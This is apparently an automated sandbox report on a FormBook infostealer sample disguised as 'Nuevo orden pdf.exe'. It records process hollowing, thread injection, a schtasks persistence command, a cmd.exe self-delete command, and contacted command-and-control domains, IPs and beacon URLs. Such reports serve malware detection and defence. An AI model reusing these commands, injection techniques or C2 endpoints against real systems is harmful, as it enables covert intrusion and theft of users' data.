            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D78794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E35BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D71B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D71B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E1D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E2138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D94BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.mediatraining-toronto.com
            Source: C:\Windows\explorer.exeNetwork Connect: 178.128.103.114 80
            Source: C:\Windows\explorer.exeDomain query: www.thefuture101.com
            Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exeDomain query: www.bluevistainvestments.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            .NET source code references suspicious native API functionsShow sources
            Source: Nuevo orden pdf.exe, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: Nuevo orden pdf.exe, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: NkwKQPLeekw.exe.0.dr, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: NkwKQPLeekw.exe.0.dr, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: 0.0.Nuevo orden pdf.exe.8c0000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: 0.0.Nuevo orden pdf.exe.8c0000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Source: 0.2.Nuevo orden pdf.exe.8c0000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
            Source: 0.2.Nuevo orden pdf.exe.8c0000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3388
            Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 11A0000
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.232011691.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.233098169.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.481980206.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Users\user\Desktop\Nuevo orden pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery231Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion41NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 404237 Sample: Nuevo orden pdf.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 10 other signatures 2->51 10 Nuevo orden pdf.exe 7 2->10         started        process3 file4 31 C:\Users\user\AppData\...31kwKQPLeekw.exe, PE32 10->31 dropped 33 C:\Users\...33kwKQPLeekw.exe:Zone.Identifier, ASCII 10->33 dropped 35 C:\Users\user\AppData\Local\...\tmpA401.tmp, XML 10->35 dropped 37 C:\Users\user\...37uevo orden pdf.exe.log, ASCII 10->37 dropped 13 RegSvcs.exe 10->13         started        16 schtasks.exe 1 10->16         started        process5 signatures6 61 Modifies the context of a thread in another process (thread injection) 13->61 63 Maps a DLL or memory area into another process 13->63 65 Sample uses process hollowing technique 13->65 67 2 other signatures 13->67 18 explorer.exe 13->18 injected 22 conhost.exe 16->22         started        process7 dnsIp8 39 thefuture101.com 178.128.103.114, 49728, 80 DIGITALOCEAN-ASNUS Netherlands 18->39 41 mediatraining-toronto.com 184.168.131.241, 49735, 80 AS-26496-GO-DADDY-COM-LLCUS United States 18->41 43 5 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 24 cmmon32.exe 18->24         started        signatures9 process10 signatures11 55 Modifies the context of a thread in another process (thread injection) 24->55 57 Maps a DLL or memory area into another process 24->57 59 Tries to detect virtualization through RDTSC time measurements 24->59 27 cmd.exe 1 24->27         started        process12 process13 29 conhost.exe 27->29         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Nuevo orden pdf.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.mediatraining-toronto.com/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ0%Avira URL Cloudsafe
            http://www.thefuture101.com/sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ0%Avira URL Cloudsafe
            http://www.bluevistainvestments.com/sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            www.lovetarot.online/sqxs/100%Avira URL Cloudmalware
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mediatraining-toronto.com
            		184.168.131.241
            		truetrue
              		unknown
              thefuture101.com
              		178.128.103.114
              		truetrue
                		unknown
                bluevistainvestments.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.mediatraining-toronto.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.thefuture101.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.bluevistainvestments.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.mediatraining-toronto.com/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.thefuture101.com/sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.bluevistainvestments.com/sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJfalse
                        • Avira URL Cloud: safe
                        		unknown
                        www.lovetarot.online/sqxs/true
                        • Avira URL Cloud: malware
                        		low

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssNuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.carterandcone.comlexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://vbcity.com/forums/t/51894.aspxNuevo orden pdf.exefalse
                                          		high
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fonts.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comexplorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://github.com/MrCylopsNuevo orden pdf.exefalse
                                                    		high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    178.128.103.114
                                                    		thefuture101.comNetherlands
                                                    		14061DIGITALOCEAN-ASNUStrue
                                                    34.102.136.180
                                                    		bluevistainvestments.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    184.168.131.241
                                                    		mediatraining-toronto.comUnited States
                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                    Analysis ID:404237
                                                    Start date:04.05.2021
                                                    Start time:20:31:14
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 45s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Nuevo orden pdf.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:32
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@10/4@3/4
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 34.9% (good quality ratio 31.9%)
                                                    • Quality average: 71.7%
                                                    • Quality standard deviation: 31.5%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 20.82.210.154, 104.43.193.48, 2.20.157.220, 104.42.151.234, 23.57.80.111, 20.82.209.183, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247, 20.54.26.129
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
